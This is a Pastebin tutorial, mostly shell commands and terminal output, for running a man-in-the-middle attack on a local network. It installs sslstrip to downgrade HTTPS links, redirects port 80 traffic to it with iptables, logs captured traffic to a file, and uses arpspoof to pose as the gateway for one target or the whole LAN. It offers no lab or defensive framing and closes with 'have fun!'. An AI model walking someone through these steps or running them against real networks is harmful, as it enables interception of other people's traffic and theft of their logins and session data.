Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- This tutorial will show you how to setup sslstrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
- Aren't you excited?!
- Open a terminal window
- Download sslstrip from:
- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- With this command:
- wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- #BEGIN TERMINAL OUTPUT
- root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- --2011-12-05 01:35:11-- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- Resolving www.thoughtcrime.org... 72.14.190.145
- Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 22198 (22K) [application/x-gzip]
- Saving to: `sslstrip-0.9.tar.gz'
- 100%[====================================================================================>] 22,198 --.-K/s in 0.07s
- 2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
- #END TERMINAL OUTPUT
- Extract the package "sslstrip-0.9.tar.gz" with the following command:
- tar -zxvf sslstrip-0.9.tar.gz
- #BEGIN TERMINAL OUTPUT
- root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
- sslstrip-0.9/
- sslstrip-0.9/README
- sslstrip-0.9/COPYING
- sslstrip-0.9/setup.py
- sslstrip-0.9/sslstrip/
- sslstrip-0.9/sslstrip/StrippingProxy.py
- sslstrip-0.9/sslstrip/SSLServerConnection.py
- sslstrip-0.9/sslstrip/ServerConnectionFactory.py
- sslstrip-0.9/sslstrip/ClientRequest.py
- sslstrip-0.9/sslstrip/ServerConnection.py
- sslstrip-0.9/sslstrip/CookieCleaner.py
- sslstrip-0.9/sslstrip/__init__.py
- sslstrip-0.9/sslstrip/DnsCache.py
- sslstrip-0.9/sslstrip/URLMonitor.py
- sslstrip-0.9/lock.ico
- sslstrip-0.9/sslstrip.py
- #END TERMINAL OUTPUT
- You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
- Install them like this:
- apt-get install python python-twisted-web
- In my case they were already installed:
- #BEGIN TERMINAL OUTPUT
- root@bt:~# apt-get install python python-twisted-web
- Reading package lists... Done
- Building dependency tree
- Reading state information... Done
- python is already the newest version.
- python-twisted-web is already the newest version.
- 0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
- #END TERMINAL OUTPUT
- Now change to the "sslstrip-0.9" directory:
- cd sslstrip-0.9
- #BEGIN TERMINAL OUTPUT
- root@bt:~# cd sslstrip-0.9
- root@bt:~/sslstrip-0.9# ls
- COPYING lock.ico README setup.py sslstrip sslstrip.py
- #END TERMINAL OUTPUT
- Run the command:
- python ./setup.py install
- #BEGIN TERMINAL OUTPUT
- root@bt:~/sslstrip-0.9# python ./setup.py install
- running install
- running build
- running build_py
- creating build
- creating build/lib.linux-x86_64-2.6
- creating build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
- running build_scripts
- creating build/scripts-2.6
- copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
- changing mode of build/scripts-2.6/sslstrip from 644 to 755
- running install_lib
- creating /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
- running install_scripts
- copying build/scripts-2.6/sslstrip -> /usr/local/bin
- changing mode of /usr/local/bin/sslstrip to 755
- running install_data
- creating /usr/local/share/sslstrip
- copying README -> /usr/local/share/sslstrip
- copying COPYING -> /usr/local/share/sslstrip
- copying lock.ico -> /usr/local/share/sslstrip
- running install_egg_info
- Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
- Cleaning up...
- #END TERMINAL OUTPUT
- Now we need to turn on IP forwarding, run this command:
- echo "1" > /proc/sys/net/ipv4/ip_forward
- Ok, iptables has got to be setup to redirect HTTP traffic to sslstrip:
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
- Change the <listenPort> above to an ephemeral port. Something like 30000 should do.
- So it should look like this:
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000
- Now we are going to execute sslstrip, run this command:
- sslstrip -a -l 30000 -w secret.log
- The listening port will be whatever you chose for iptables to redirect HTTP traffic too.
- #BEGIN TERMINAL OUTPUT
- root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log
- sslstrip 0.9 by Moxie Marlinspike running...
- #END TERMINAL OUTPUT
- Notice above in the terminal output. Don't kill the terminal session. sslstrip is running!
- Open a new terminal window.
- Now we need to setup arpspoof so the network will think you are the gateway or router. This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
- arpspoof -i <interface> -t <targetIP> <gatewayIP>
- If you don't know your interface setting, just run a quick "ifconfig" command and it will list it. The <gatewayIP> is the networks real gateway/router, this is the traffic we want to hijack.
- If you want arpspoof to intercept traffic across the whole LAN run:
- arpspoof -i <interface> <gatewayIP>
- So, I would run the command like this:
- arpspoof -i eth0 -t 10.10.1.20 10.10.1.254
- #BEGIN TERMINAL OUTPUT
- root@bt:~# arpspoof -i eth0 10.10.1.254
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- #END TERMINAL OUTPUT
- Notice above in the terminal output, you will constantly receive arp replies, just let it run. Don't kill the terminal session.
- If you need additional help just run:
- sslstrip --help
- #BEGIN TERMINAL OUTPUT
- root@bt:~/sslstrip-0.9# sslstrip --help
- sslstrip 0.9 by Moxie Marlinspike
- Usage: sslstrip <options>
- Options:
- -w <filename>, --write=<filename> Specify file to log to (optional).
- -p , --post Log only SSL POSTs. (default)
- -s , --ssl Log all SSL traffic to and from server.
- -a , --all Log all SSL and HTTP traffic to and from server.
- -l <port>, --listen=<port> Port to listen on (default 10000).
- -f , --favicon Substitute a lock favicon on secure requests.
- -k , --killsessions Kill sessions in progress.
- -h Print this help message.
- #END TERMINAL OUTPUT
- That's it...have fun!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement